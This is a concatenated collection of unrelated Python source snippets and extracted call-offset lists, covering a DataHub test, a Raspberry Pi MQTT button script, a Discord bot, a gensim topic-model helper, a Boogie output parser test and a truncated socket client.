"cv2.imshow",
"angus_display.displayAnimation",
"angus_display.displayAge",
"angus_display.displayGaze",
"cv2.cvtColor",
"angus_display.displayAvatar",
"angus_display.display_logo",
"cv2.destroyAllWindows",
"datetime.datetime.now",
"angus_display.displayEmotion",
"cv2.waitKey",
"angus_display.displayGender",
"cv2.VideoCapture",
"stats.Stats",
"numpy.array",
"angus.connect",
"angus_display.computeConversion"
] |
[((995, 1025), 'cv2.VideoCapture', 'cv2.VideoCapture', (['stream_index'], {}), '(stream_index)\n', (1011, 1025), False, 'import cv2\n'), ((1407, 1429), 'stats.Stats', 'st.Stats', (['"""stats.json"""'], {}), "('stats.json')\n", (1415, 1429), True, 'import stats as st\n'), ((1478, 1493), 'angus.connect', 'angus.connect', ([], {}), '()\n', (1491, 1493), False, 'import angus\n'), ((3597, 3620), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (3618, 3620), False, 'import cv2\n'), ((1712, 1751), 'cv2.cvtColor', 'cv2.cvtColor', (['frame', 'cv2.COLOR_BGR2GRAY'], {}), '(frame, cv2.COLOR_BGR2GRAY)\n', (1724, 1751), False, 'import cv2\n'), ((1772, 1830), 'cv2.imencode', 'cv2.imencode', (['""".jpg"""', 'gray', '[cv2.IMWRITE_JPEG_QUALITY, 80]'], {}), "('.jpg', gray, [cv2.IMWRITE_JPEG_QUALITY, 80])\n", (1784, 1830), False, 'import cv2\n'), ((1905, 1936), 'datetime.datetime.now', 'datetime.datetime.now', (['pytz.utc'], {}), '(pytz.utc)\n', (1926, 1936), False, 'import datetime\n'), ((3100, 3154), 'angus_display.blur', 'ad.blur', (['frame', 'panel[0]', 'panel[1]', '(255, 255, 255)', '(2)'], {}), '(frame, panel[0], panel[1], (255, 255, 255), 2)\n', (3107, 3154), True, 'import angus_display as ad\n'), ((3163, 3248), 'angus_display.computeConversion', 'ad.computeConversion', (['res', 'events', 'entities', 'engaged', 'stats', 'animation', '(0.5)', '(500)'], {}), '(res, events, entities, engaged, stats, animation, 0.5, 500\n )\n', (3183, 3248), True, 'import angus_display as ad\n'), ((3327, 3364), 'angus_display.displayAnimation', 'ad.displayAnimation', (['frame', 'animation'], {}), '(frame, animation)\n', (3346, 3364), True, 'import angus_display as ad\n'), ((3373, 3412), 'angus_display.display_logo', 'ad.display_logo', (['frame', '(20)', '(height - 60)'], {}), '(frame, 20, height - 60)\n', (3388, 3412), True, 'import angus_display as ad\n'), ((3422, 3449), 'cv2.imshow', 'cv2.imshow', (['"""window"""', 'frame'], {}), "('window', frame)\n", (3432, 3449), False, 'import cv2\n'), ((2756, 2795), 'angus_display.displayAge', 'ad.displayAge', (['frame', 'idx', 'h', '(0.5)', '(0.35)'], {}), '(frame, idx, h, 0.5, 0.35)\n', (2769, 2795), True, 'import angus_display as ad\n'), ((2814, 2843), 'angus_display.displayHair', 'ad.displayHair', (['frame', 'idx', 'h'], {}), '(frame, idx, h)\n', (2828, 2843), True, 'import angus_display as ad\n'), ((2856, 2890), 'angus_display.displayAvatar', 'ad.displayAvatar', (['frame', 'h', 'pt', 'ch'], {}), '(frame, h, pt, ch)\n', (2872, 2890), True, 'import angus_display as ad\n'), ((2903, 2934), 'angus_display.displayEmotion', 'ad.displayEmotion', (['frame', 'h', 'pt'], {}), '(frame, h, pt)\n', (2920, 2934), True, 'import angus_display as ad\n'), ((2947, 2977), 'angus_display.displayGender', 'ad.displayGender', (['frame', 'h', 'pt'], {}), '(frame, h, pt)\n', (2963, 2977), True, 'import angus_display as ad\n'), ((2990, 3028), 'angus_display.displayGaze', 'ad.displayGaze', (['frame', 'idx', 'h', 'pt', '(0.5)'], {}), '(frame, idx, h, pt, 0.5)\n', (3004, 3028), True, 'import angus_display as ad\n'), ((3462, 3476), 'cv2.waitKey', 'cv2.waitKey', (['(1)'], {}), '(1)\n', (3473, 3476), False, 'import cv2\n'), ((1865, 1879), 'numpy.array', 'np.array', (['buff'], {}), '(buff)\n', (1873, 1879), True, 'import numpy as np\n')]
|
from datetime import datetime
import pytest
from pydantic import ValidationError
from datahub.configuration.time_window_config import BucketDuration, get_time_bucket
from datahub.emitter.mcp import MetadataChangeProposalWrapper
from datahub.ingestion.api.workunit import MetadataWorkUnit
from datahub.ingestion.source.usage.usage_common import (
BaseUsageConfig,
GenericAggregatedDataset,
)
from datahub.metadata.schema_classes import DatasetUsageStatisticsClass
_TestTableRef = str
_TestAggregatedDataset = GenericAggregatedDataset[_TestTableRef]
def test_add_one_query_without_columns():
test_email = "<EMAIL>"
test_query = "select * from test"
event_time = datetime(2020, 1, 1)
floored_ts = get_time_bucket(event_time, BucketDuration.DAY)
resource = "test_db.test_schema.test_table"
ta = _TestAggregatedDataset(bucket_start_time=floored_ts, resource=resource)
ta.add_read_entry(
test_email,
test_query,
[],
)
assert ta.queryCount == 1
assert ta.queryFreq[test_query] == 1
assert ta.userFreq[test_email] == 1
assert len(ta.columnFreq) == 0
def test_multiple_query_without_columns():
test_email = "<EMAIL>"
test_email2 = "<EMAIL>"
test_query = "select * from test"
test_query2 = "select * from test2"
event_time = datetime(2020, 1, 1)
floored_ts = get_time_bucket(event_time, BucketDuration.DAY)
resource = "test_db.test_schema.test_table"
ta = _TestAggregatedDataset(bucket_start_time=floored_ts, resource=resource)
ta.add_read_entry(
test_email,
test_query,
[],
)
ta.add_read_entry(
test_email,
test_query,
[],
)
ta.add_read_entry(
test_email2,
test_query2,
[],
)
assert ta.queryCount == 3
assert ta.queryFreq[test_query] == 2
assert ta.userFreq[test_email] == 2
assert ta.queryFreq[test_query2] == 1
assert ta.userFreq[test_email2] == 1
assert len(ta.columnFreq) == 0
def test_make_usage_workunit():
test_email = "<EMAIL>"
test_query = "select * from test"
event_time = datetime(2020, 1, 1)
floored_ts = get_time_bucket(event_time, BucketDuration.DAY)
resource = "test_db.test_schema.test_table"
ta = _TestAggregatedDataset(bucket_start_time=floored_ts, resource=resource)
ta.add_read_entry(
test_email,
test_query,
[],
)
wu: MetadataWorkUnit = ta.make_usage_workunit(
bucket_duration=BucketDuration.DAY, urn_builder=lambda x: x, top_n_queries=10
)
assert wu.id == "2020-01-01T00:00:00-test_db.test_schema.test_table"
assert isinstance(wu.get_metadata()["metadata"], MetadataChangeProposalWrapper)
du: DatasetUsageStatisticsClass = wu.get_metadata()["metadata"].aspect
assert du.totalSqlQueries == 1
assert du.topSqlQueries
assert du.topSqlQueries.pop() == test_query
def test_query_trimming():
test_email: str = "<EMAIL>"
test_query: str = "select * from test where a > 10 and b > 20 order by a asc"
top_n_queries: int = 10
total_budget_for_query_list: int = 200
event_time = datetime(2020, 1, 1)
floored_ts = get_time_bucket(event_time, BucketDuration.DAY)
resource = "test_db.test_schema.test_table"
ta = _TestAggregatedDataset(bucket_start_time=floored_ts, resource=resource)
ta.total_budget_for_query_list = total_budget_for_query_list
ta.add_read_entry(
test_email,
test_query,
[],
)
wu: MetadataWorkUnit = ta.make_usage_workunit(
bucket_duration=BucketDuration.DAY,
urn_builder=lambda x: x,
top_n_queries=top_n_queries,
)
assert wu.id == "2020-01-01T00:00:00-test_db.test_schema.test_table"
assert isinstance(wu.get_metadata()["metadata"], MetadataChangeProposalWrapper)
du: DatasetUsageStatisticsClass = wu.get_metadata()["metadata"].aspect
assert du.totalSqlQueries == 1
assert du.topSqlQueries
assert du.topSqlQueries.pop() == "select * f ..."
def test_top_n_queries_validator_fails():
with pytest.raises(ValidationError) as excinfo:
GenericAggregatedDataset.total_budget_for_query_list = 20
BaseUsageConfig(top_n_queries=2)
assert "top_n_queries is set to 2 but it can be maximum 1" in str(excinfo.value)
|
[
"datahub.ingestion.source.usage.usage_common.BaseUsageConfig",
"pytest.raises",
"datahub.configuration.time_window_config.get_time_bucket",
"datetime.datetime"
] |
[((687, 707), 'datetime.datetime', 'datetime', (['(2020)', '(1)', '(1)'], {}), '(2020, 1, 1)\n', (695, 707), False, 'from datetime import datetime\n'), ((726, 773), 'datahub.configuration.time_window_config.get_time_bucket', 'get_time_bucket', (['event_time', 'BucketDuration.DAY'], {}), '(event_time, BucketDuration.DAY)\n', (741, 773), False, 'from datahub.configuration.time_window_config import BucketDuration, get_time_bucket\n'), ((1329, 1349), 'datetime.datetime', 'datetime', (['(2020)', '(1)', '(1)'], {}), '(2020, 1, 1)\n', (1337, 1349), False, 'from datetime import datetime\n'), ((1368, 1415), 'datahub.configuration.time_window_config.get_time_bucket', 'get_time_bucket', (['event_time', 'BucketDuration.DAY'], {}), '(event_time, BucketDuration.DAY)\n', (1383, 1415), False, 'from datahub.configuration.time_window_config import BucketDuration, get_time_bucket\n'), ((2140, 2160), 'datetime.datetime', 'datetime', (['(2020)', '(1)', '(1)'], {}), '(2020, 1, 1)\n', (2148, 2160), False, 'from datetime import datetime\n'), ((2179, 2226), 'datahub.configuration.time_window_config.get_time_bucket', 'get_time_bucket', (['event_time', 'BucketDuration.DAY'], {}), '(event_time, BucketDuration.DAY)\n', (2194, 2226), False, 'from datahub.configuration.time_window_config import BucketDuration, get_time_bucket\n'), ((3157, 3177), 'datetime.datetime', 'datetime', (['(2020)', '(1)', '(1)'], {}), '(2020, 1, 1)\n', (3165, 3177), False, 'from datetime import datetime\n'), ((3196, 3243), 'datahub.configuration.time_window_config.get_time_bucket', 'get_time_bucket', (['event_time', 'BucketDuration.DAY'], {}), '(event_time, BucketDuration.DAY)\n', (3211, 3243), False, 'from datahub.configuration.time_window_config import BucketDuration, get_time_bucket\n'), ((4095, 4125), 'pytest.raises', 'pytest.raises', (['ValidationError'], {}), '(ValidationError)\n', (4108, 4125), False, 'import pytest\n'), ((4212, 4244), 'datahub.ingestion.source.usage.usage_common.BaseUsageConfig', 'BaseUsageConfig', ([], {'top_n_queries': '(2)'}), '(top_n_queries=2)\n', (4227, 4244), False, 'from datahub.ingestion.source.usage.usage_common import BaseUsageConfig, GenericAggregatedDataset\n')]
|
#!/usr/bin/python
import paho.mqtt.publish as publish
import RPi.GPIO as GPIO
import subprocess
import time
import os
#Define list of button parameters
PIN_CONFIG = [
{'pin':20, 'mqttTopic':'home/htpc/power/restart'},
{'pin':21, 'mqttTopic':'home/htpc/power/off'},
{'pin':13, 'mqttTopic':'home/htpc/kodi/on'},
{'pin':19, 'mqttTopic':'home/htpc/plex/on'},
{'pin':26, 'mqttTopic':'home/htpc/steam/on'}
]
#Define other inputs
HOST = '10.0.1.xxx'
MQTT_BROKER = '10.0.1.xxx'
IR_CMD = 'irsend SEND_ONCE samsung KEY_POWER2'
WOL_CMD = 'sudo etherwake xx:xx:xx:xx:xx:xx'
#Define functions
def MqttMessage(mqtt_topic, mqtt_broker):
publish.single(mqtt_topic, '', hostname=mqtt_broker)
print('MQTT message \"' + mqtt_topic + '\" sent via broker \"' + mqtt_broker + '\"')
def CmdBash(command, message):
subprocess.call(['bash', '-c', command])
if message != '': print(message)
def CheckStatus(host):
print('Checking status of: ' + host)
response = os.system("ping -c 1 " + host)
if response:
print('Fail, host \"' + host + '\" is unreachable')
return False
else:
print('Success')
return True
def Startup(host, mqtt_topic):
#Ping HTPC to check if already powered on, else initiate startup sequence
if CheckStatus(host): return True
print('Initiating startup sequence instead')
#Turn on TV then boot PC using WOL
CmdBash(IR_CMD, 'IR power signal sent to TV')
CmdBash(WOL_CMD, 'Magic packet sent to wake HTPC')
def Callback(channel):
#Find mqttTopic corresponding to PIN
for item in PIN_CONFIG:
if item['pin'] == channel:
mqtt_topic = item['mqttTopic']
#Print details of instruction being processed
print('Button ' + str(channel) + ' was pressed which corresponds to the command: ' + mqtt_topic)
#Process topic
if mqtt_topic == 'home/htpc/power/restart' or 'home/htpc/power/off':
if CheckStatus(HOST): #check whether htpc already on
MqttMessage(mqtt_topic, MQTT_BROKER) #trigger shutdown directly
if mqtt_topic == 'home/htpc/power/off':
time.sleep(5) #wait 5s, then turn off TV
CmdBash(IR_CMD, 'IR power signal sent to TV')
else:
if startup(HOST, mqtt_topic): #send MQTT message if PC on, else initiate startup sequence
MqttMessage(mqtt_topic, MQTT_BROKER)
def GPIOsetup(pin):
GPIO.setup(pin, GPIO.IN, pull_up_down=GPIO.PUD_UP)
GPIO.add_event_detect(pin, GPIO.FALLING, callback=Callback, bouncetime=10000)
#@@@ MAIN PROGRAM @@@
#Setup buttons according to parameters defined in list
GPIO.setmode(GPIO.BCM)
for item in PIN_CONFIG:
pin = item['pin']
GPIOsetup(pin)
#Infinite loop to prevent program from ending
while True:
continue
|
[
"RPi.GPIO.setmode",
"RPi.GPIO.setup",
"os.system",
"time.sleep",
"subprocess.call",
"paho.mqtt.publish.single",
"RPi.GPIO.add_event_detect"
] |
[((2530, 2552), 'RPi.GPIO.setmode', 'GPIO.setmode', (['GPIO.BCM'], {}), '(GPIO.BCM)\n', (2542, 2552), True, 'import RPi.GPIO as GPIO\n'), ((628, 680), 'paho.mqtt.publish.single', 'publish.single', (['mqtt_topic', '""""""'], {'hostname': 'mqtt_broker'}), "(mqtt_topic, '', hostname=mqtt_broker)\n", (642, 680), True, 'import paho.mqtt.publish as publish\n'), ((802, 842), 'subprocess.call', 'subprocess.call', (["['bash', '-c', command]"], {}), "(['bash', '-c', command])\n", (817, 842), False, 'import subprocess\n'), ((954, 984), 'os.system', 'os.system', (["('ping -c 1 ' + host)"], {}), "('ping -c 1 ' + host)\n", (963, 984), False, 'import os\n'), ((2321, 2371), 'RPi.GPIO.setup', 'GPIO.setup', (['pin', 'GPIO.IN'], {'pull_up_down': 'GPIO.PUD_UP'}), '(pin, GPIO.IN, pull_up_down=GPIO.PUD_UP)\n', (2331, 2371), True, 'import RPi.GPIO as GPIO\n'), ((2374, 2451), 'RPi.GPIO.add_event_detect', 'GPIO.add_event_detect', (['pin', 'GPIO.FALLING'], {'callback': 'Callback', 'bouncetime': '(10000)'}), '(pin, GPIO.FALLING, callback=Callback, bouncetime=10000)\n', (2395, 2451), True, 'import RPi.GPIO as GPIO\n'), ((2034, 2047), 'time.sleep', 'time.sleep', (['(5)'], {}), '(5)\n', (2044, 2047), False, 'import time\n')]
|
import unittest
from histogram_class import Histogram
class Test_Histogram(unittest.TestCase):
def test_add_to_histogram(self):
h = Histogram()
h.add("Apache")
h.add("Apache")
h.add("IIS")
self.assertTrue(h.count("Apache") == 2)
self.assertTrue(h.count("IIS") == 1)
def test_get_dict(self):
h = Histogram()
h.add("Apache")
h.add("Apache")
h.add("IIS")
wanted_result = {"Apache": 2, "IIS": 1}
self.assertEqual(h.get_dict(), wanted_result)
if __name__ == '__main__':
unittest.main()
|
[
"unittest.main",
"histogram_class.Histogram"
] |
[((580, 595), 'unittest.main', 'unittest.main', ([], {}), '()\n', (593, 595), False, 'import unittest\n'), ((147, 158), 'histogram_class.Histogram', 'Histogram', ([], {}), '()\n', (156, 158), False, 'from histogram_class import Histogram\n'), ((364, 375), 'histogram_class.Histogram', 'Histogram', ([], {}), '()\n', (373, 375), False, 'from histogram_class import Histogram\n')]
|
import os
import logging
from typing import Dict, List, Any, Union, Callable, NewType
from ..common.absclient import AbstractPipelineComponent
from ..grammar_tester.grammartester import GrammarTesterComponent
from ..grammar_learner import GrammarLearnerComponent
from ..text_parser import TextParserComponent
from ..dash_board.textdashboard import TextFileDashboardComponent
from .varhelper import get_path_from_dict, subst_variables_in_str, subst_variables_in_dict, subst_variables_in_dict2
from .pipelinetreenode import PipelineTreeNode2
__all__ = ['build_tree', 'run_tree']
logger = logging.getLogger(__name__)
class PathCreatorComponent(AbstractPipelineComponent):
def __init__(self):
pass
def validate_parameters(self, **kwargs):
return True
def run(self, **kwargs):
return {}
@staticmethod
def create(**kwargs):
path = kwargs.get("path", None)
if path is not None and not os.path.isdir(path):
os.makedirs(path)
return {"path": path}
PIPELINE_COMPONENTS = {
"path-creator": PathCreatorComponent,
"grammar-tester": GrammarTesterComponent,
"grammar-learner": GrammarLearnerComponent,
"text-parser": TextParserComponent,
"dash-board": TextFileDashboardComponent
}
def get_component(name: str, params: dict) -> AbstractPipelineComponent:
"""
Create an instance of the pipeline component
:param name: Pipeline component name.
:return: AbstractPipelineComponent instance pointer.
"""
try:
# Create an instance of specified pipeline component
component = PIPELINE_COMPONENTS[name](**params)
# Check the instance to be proper pipeline component
if not isinstance(component, AbstractPipelineComponent):
raise Exception("Error: " + str(type(component)) + " is not an instance of AbstractPipelineComponent")
return component
except KeyError:
raise Exception("Error: '{}' is not a valid pipeline component name.".format(name))
except Exception as err:
logger.error(str(type(err)) + ": " + str(err))
raise err
def single_proc_exec(node: PipelineTreeNode2) -> None:
if node is None:
return
leaf = node._environment["LEAF"]
create = node._environment.get("CREATE_LEAF", False)
# Create path if it does not exist
if create and not os.path.isdir(leaf):
os.makedirs(leaf)
parameters = node._parameters
result = {}
pre_exec = parameters.get("pre-exec-req", None)
if pre_exec:
for req in pre_exec:
result = handle_request(node, req)
# Create component instance
component = get_component(node._component_name, parameters)
# Execute component
result = component.run(**{**parameters, **result})
post_exec = parameters.get("post-exec-req", None)
if post_exec:
for req in post_exec:
handle_request(node, {**req, **result})
# Just for debug purposes
logger.info(node._component_name + ": successfull execution")
def handle_request(node: PipelineTreeNode2, req: dict) -> None:
"""
Handle Post-execute Request
:param node: Pipiline tree node reference.
:param req: Request parameter dictionary.
:return: None
"""
obj = req.pop("obj", None)
if obj is None:
raise Exception("Error: Required parameter 'obj' does not exist.")
pos = str(obj).find(".")
if pos < 0:
raise Exception("Error: Object name and method should be separated by comma.")
name = obj[:pos]
meth = obj[pos+1:]
inst = node.static_components.get(name, None)
if inst is None:
raise Exception("Error: static component '{}' does not exist.".format(name))
return getattr(inst, meth)(**req)
def prepare_parameters(parent: PipelineTreeNode2, common: dict, specific: dict, environment: dict, first_char="%",
create_sub_dir: bool=True) -> (dict, dict):
"""
Create built-in variables (PREV, RPREV, LEAF, RLEAF), substitute variables, starting with '%'
with their real values.
:param parent: Parent node of the execution tree.
:param common: Common parameters dictionary.
:param specific: Specific parameters dictionary.
:param environment: Environment dictionary.
:param first_char: Character that delimits variables ('%' is default).
:param create_sub_dir Boolean value forces the program to create subdirectory path based on specific dictionary.
:return: Tuple of two dictionaries: one for parameters, another for environment.
"""
# Merge two dictionaries 'common-parameters' and 'specific-parameters'
all_parameters = {**common, **specific} if common is not None else specific
create_leaf = False
# Check if 'LEAF' path should be created
for v in all_parameters.values():
if type(v) == str and v.find("LEAF") >= 0:
create_leaf = True
# Path parameters should not appear in other paths
non_path = {k: v for k, v in zip(specific.keys(), specific.values())
if (not (isinstance(v, list) or isinstance(v, dict) or isinstance(v, str)))
or (isinstance(v, str) and v.find("/") < 0 and v.find("%") < 0)}
# Get subdir path based on specific parameters if requested
rleaf = get_path_from_dict(non_path, "_") if create_leaf else ""
# rleaf = get_path_from_dict(non_path, "_") if create_sub_dir else ""
logger.debug("RLEAF: " + rleaf)
inherit_prev = all_parameters.get("inherit_prev_path", False)
leaf = environment["PREV"] + "/" + rleaf if inherit_prev else environment["ROOT"] + "/" + rleaf
logger.debug("LEAF: " + leaf)
new_environment = {**environment, **{"RLEAF": rleaf, "LEAF": leaf, "CREATE_LEAF": create_leaf}}
scopes = {"THIS": {**new_environment, **all_parameters}, "PREV": {}} if parent is None else \
{"THIS": {**new_environment, **all_parameters}, "PREV": {**parent._environment, **parent._parameters}}
# Substitute derived path for LEAF, PREV and other variables
all_parameters = subst_variables_in_dict2(all_parameters, scopes, True, first_char)
logger.debug("all_parameters: {}".format(all_parameters))
return all_parameters, new_environment
def build_tree(config: List, globals: dict, first_char="%") -> List[PipelineTreeNode2]:
parents = list()
for level, component_config in enumerate(config):
name = component_config.get("component", None)
type = component_config.get("type", "dynamic")
comm = component_config.get("common-parameters", None)
spec = component_config.get("specific-parameters", None)
if name is None:
raise Exception("No 'component' parameter found in configuration.")
if type == "dynamic" and spec is None:
raise Exception("No 'specific-parameters' section found in configuration.")
if type == "static":
params = subst_variables_in_dict(component_config.get("parameters", {}), globals, first_char)
inst_name = component_config.get("instance-name", None)
if inst_name is not None:
PipelineTreeNode2.static_components[inst_name] = get_component(name, params)
continue
children = list()
if len(parents):
for parent in parents:
# Only if the previous component path should be followed
if parent._parameters.get("follow_exec_path", True):
for specific in spec:
# Create parameter and environment dictionaries
parameters, environment = prepare_parameters(
parent, comm, specific,
{**globals, **{"RPREV": parent._environment["RLEAF"], "PREV": parent._environment["LEAF"]}},
first_char, len(spec) > 1)
children.append(PipelineTreeNode2(level, name, parameters, environment, parent))
else:
for specific in spec:
# Create parameter and environment dictionaries
parameters, environment = prepare_parameters(None, comm, specific, globals, first_char, len(spec) > 1)
children.append(PipelineTreeNode2(level, name, parameters, environment, None))
parents = None
parents = children
children = None
return PipelineTreeNode2.roots
def run_tree() -> None:
PipelineTreeNode2.traverse_all(single_proc_exec)
|
[
"os.path.isdir",
"os.makedirs",
"logging.getLogger"
] |
[((591, 618), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (608, 618), False, 'import logging\n'), ((2421, 2438), 'os.makedirs', 'os.makedirs', (['leaf'], {}), '(leaf)\n', (2432, 2438), False, 'import os\n'), ((982, 999), 'os.makedirs', 'os.makedirs', (['path'], {}), '(path)\n', (993, 999), False, 'import os\n'), ((2392, 2411), 'os.path.isdir', 'os.path.isdir', (['leaf'], {}), '(leaf)\n', (2405, 2411), False, 'import os\n'), ((949, 968), 'os.path.isdir', 'os.path.isdir', (['path'], {}), '(path)\n', (962, 968), False, 'import os\n')]
|
import discord,platform,os
from discord.ext import commands
t=os.environ['DISCORD_TOKEN']
pfx=os.environ['DISCORD_PFX']
hid=int(os.environ['HID'])
async def is_owner(ctx):
return ctx.author.id==hid
client=commands.Bot(command_prefix=pfx,case_insensitive=True)
@client.command()
async def tst(ctx):
await ctx.send(content="I'm up!")
@client.command()
@commands.check(is_owner)
async def stop(ctx):
await ctx.send(content="Goodbye!")
await client.close()
@client.event
async def on_message(message):
op=await is_owner(message)
if message.author.id==client.user.id:
return
if message.content.lower().startswith("all.stop") and op:
await message.channel.send(content="Goodbye!")
await client.close()
if message.content.lower().startswith("all.tst"):
await message.channel.send(content="I'm up!")
if message.content.lower().startswith(f"{pfx}token") or message.content.lower().startswith("all.token"):
if op:
print(f"{message.author}<{message.author.id}> requested this bot's token and it was sent to them")
await message.author.send(content=f"Here is the token you requested!\n```\n{t}\n```")
await message.channel.send(content=":white_check_mark: Check your DMs! :white_check_mark:")
elif not op:
print(f"{message.author}<{message.author.id}> requested this bot's token and it was not sent to them because they did not have the required permission")
await message.channel.send(content=":x: You don't have the required permission. This incident has been logged. :x:")
await client.process_commands(message)
@client.event
async def on_ready():
startlat=int(client.latency*1000)
pyver=platform.python_version()
discver=discord.__version__
print(f"We have logged in as {client.user}<@!{client.user.id}>")
await client.change_presence(status="dnd",activity=discord.Game(f"Python {pyver} Discord.py {discver}"))
@client.event
async def on_command_error(ctx, error):
if isinstance(error,commands.errors.CommandNotFound):
pass
client.run(t)
|
[
"discord.Game",
"discord.ext.commands.check",
"platform.python_version",
"discord.ext.commands.Bot"
] |
[((209, 264), 'discord.ext.commands.Bot', 'commands.Bot', ([], {'command_prefix': 'pfx', 'case_insensitive': '(True)'}), '(command_prefix=pfx, case_insensitive=True)\n', (221, 264), False, 'from discord.ext import commands\n'), ((359, 383), 'discord.ext.commands.check', 'commands.check', (['is_owner'], {}), '(is_owner)\n', (373, 383), False, 'from discord.ext import commands\n'), ((1735, 1760), 'platform.python_version', 'platform.python_version', ([], {}), '()\n', (1758, 1760), False, 'import discord, platform, os\n'), ((1917, 1969), 'discord.Game', 'discord.Game', (['f"""Python {pyver} Discord.py {discver}"""'], {}), "(f'Python {pyver} Discord.py {discver}')\n", (1929, 1969), False, 'import discord, platform, os\n')]
|
from soteria.debug_support.boogie_output_parser import BoogieOutputParser
class TestBoogieOutputParser:
sample1 = '''input(168,1): Error BP5002: A precondition for this call might not hold.
input(146,1): Related location: This is the precondition that might not hold.
Execution trace:
input(164,2): anon0
input(168,1): Error BP5002: A precondition for this call might not hold.
input(145,1): Related location: This is the precondition that might not hold.
Execution trace:
input(164,2): anon0
Boogie program verifier finished with 2 verified, 2 errors'''
sample2 = '''Boogie program verifier version 2.3.0.61016, Copyright (c) 2003-2014, Microsoft.
test_models/stability_decrement_transfer.bpl(167,1): Error BP5002: A precondition for this call might not hold.
test_models/stability_decrement_transfer.bpl(145,1): Related location: This is the precondition that might not hold.
Execution trace:
test_models/stability_decrement_transfer.bpl(163,2): anon0
Boogie program verifier finished with 2 verified, 1 error'''
def test_parse(self):
parser = BoogieOutputParser()
errors = parser.parse(self.sample1)
assert len(errors) == 2
assert errors[0].line == 168
assert errors[0].code == 'BP5002'
assert errors[0].message == 'A precondition for this call might not hold.'
assert len(errors[0].related_locations) == 1
assert errors[0].related_locations[0].line == 146
assert errors[1].related_locations[0].line == 145
|
[
"soteria.debug_support.boogie_output_parser.BoogieOutputParser"
] |
[((1083, 1103), 'soteria.debug_support.boogie_output_parser.BoogieOutputParser', 'BoogieOutputParser', ([], {}), '()\n', (1101, 1103), False, 'from soteria.debug_support.boogie_output_parser import BoogieOutputParser\n')]
|
# -*- coding: utf-8 -*-
import logging
import numpy as np
import gensim
from .common import MultiprocModelsRunner, MultiprocModelsWorkerABC, MultiprocEvaluationRunner, \
MultiprocEvaluationWorkerABC, dtm_to_gensim_corpus
from .eval_metrics import metric_cao_juan_2009
AVAILABLE_METRICS = (
'perplexity',
# 'cross_validation',
'cao_juan_2009',
# 'arun_2010',
)
logger = logging.getLogger('tmtoolkit')
def get_model_perplexity(model, eval_corpus):
n_words = sum(cnt for document in eval_corpus for _, cnt in document)
bound = model.bound(eval_corpus)
perwordbound = bound / n_words
return np.exp2(-perwordbound)
class MultiprocModelsWorkerGensim(MultiprocModelsWorkerABC):
package_name = 'gensim'
def fit_model(self, data, params, return_data=False):
data = dtm_to_gensim_corpus(data.tocsr())
model = gensim.models.ldamodel.LdaModel(data, **params)
if return_data:
return model, data
else:
return model
class MultiprocEvaluationWorkerGensim(MultiprocEvaluationWorkerABC, MultiprocModelsWorkerGensim):
def fit_model(self, data, params, return_data=False):
model, data = super(MultiprocEvaluationWorkerGensim, self).fit_model(data, params, return_data=True)
results = {}
if self.return_models:
results['model'] = model
for metric in self.eval_metric:
# if metric == 'cross_validation': continue
if metric == 'cao_juan_2009':
res = metric_cao_juan_2009(model.state.get_lambda())
# elif metric == 'arun_2010': # TODO: fix this (get document topic distr. from gensim model)
# results = metric_arun_2010(train_model.state.get_lambda(), train_model[corpus_train], data.sum(axis=1))
else: # default: perplexity
res = get_model_perplexity(model, data)
logger.info('> evaluation result with metric "%s": %f' % (metric, res))
results[metric] = res
return results
def compute_models_parallel(data, varying_parameters=None, constant_parameters=None, n_max_processes=None):
"""
Compute several Topic Models in parallel using the "gensim" package. Use a single or multiple document term matrices
`data` and optionally a list of varying parameters `varying_parameters`. Pass parameters in `constant_parameters`
dict to each model calculation. Use at maximum `n_max_processes` processors or use all available processors if None
is passed.
`data` can be either a Document-Term-Matrix (NumPy array/matrix, SciPy sparse matrix) or a dict with document ID ->
Document-Term-Matrix mapping when calculating models for multiple corpora (named multiple documents).
If `data` is a dict of named documents, this function will return a dict with document ID -> result list. Otherwise
it will only return a result list. A result list always is a list containing tuples `(parameter_set, model)` where
`parameter_set` is a dict of the used parameters.
"""
mp_models = MultiprocModelsRunner(MultiprocModelsWorkerGensim, data, varying_parameters, constant_parameters,
n_max_processes=n_max_processes)
return mp_models.run()
def evaluate_topic_models(data, varying_parameters, constant_parameters=None, n_max_processes=None, return_models=False,
metric=None, **metric_kwargs):
"""
Compute several Topic Models in parallel using the "gensim" package. Calculate the models using a list of varying
parameters `varying_parameters` on a single Document-Term-Matrix `data`. Pass parameters in `constant_parameters`
dict to each model calculation. Use at maximum `n_max_processes` processors or use all available processors if None
is passed.
`data` must be a Document-Term-Matrix (NumPy array/matrix, SciPy sparse matrix).
Will return a list of size `len(varying_parameters)` containing tuples `(parameter_set, eval_results)` where
`parameter_set` is a dict of the used parameters and `eval_results` is a dict of metric names -> metric results.
"""
mp_eval = MultiprocEvaluationRunner(MultiprocEvaluationWorkerGensim, AVAILABLE_METRICS, data,
varying_parameters, constant_parameters,
metric=metric, metric_options=metric_kwargs,
n_max_processes=n_max_processes, return_models=return_models)
return mp_eval.run()
|
[
"numpy.exp2",
"gensim.models.ldamodel.LdaModel",
"logging.getLogger"
] |
[((393, 423), 'logging.getLogger', 'logging.getLogger', (['"""tmtoolkit"""'], {}), "('tmtoolkit')\n", (410, 423), False, 'import logging\n'), ((630, 652), 'numpy.exp2', 'np.exp2', (['(-perwordbound)'], {}), '(-perwordbound)\n', (637, 652), True, 'import numpy as np\n'), ((869, 916), 'gensim.models.ldamodel.LdaModel', 'gensim.models.ldamodel.LdaModel', (['data'], {}), '(data, **params)\n', (900, 916), False, 'import gensim\n')]
|
# -*- coding: utf-8 -*-
import queue
import select
import signal
import socket
import sys
import threading
class Client:
def __init__(self, host, port, sq, rq):
self._host = host
self._port = port
self._connect()
self._send_q = sq
self._recv_q = rq
if sys.platform == "linux":
signal.signal(signal.SIGUSR2, self._handler)
self._connected = threading.Event()
self._client_thread = threading.Thread(target=self._receive_data)
self._connected.set()
self._client_thread.start()
def _handler(self, signum, frame):
self._connected.clear()
def _connect(self):
for addrinfo in socket.getaddrinfo(self._host, self._port, socket.AF_UNSPEC, socket.SOCK_STREAM):
ai_family, sock_type, _, _, sock_addr = addrinfo
try:
sock = socket.socket(ai_family, sock_type)
except socket.error as ex:
print("(!) sock: %s\n" % ex)
except Exception as ex:
print("(!) sock: %s\n" % ex)
try:
sock.connect(sock_addr)
except socket.error as ex:
print("(!) connect: %s\n" % ex)
exit(1)
sock.setblocking(0)
if self._host != sock_addr[0]:
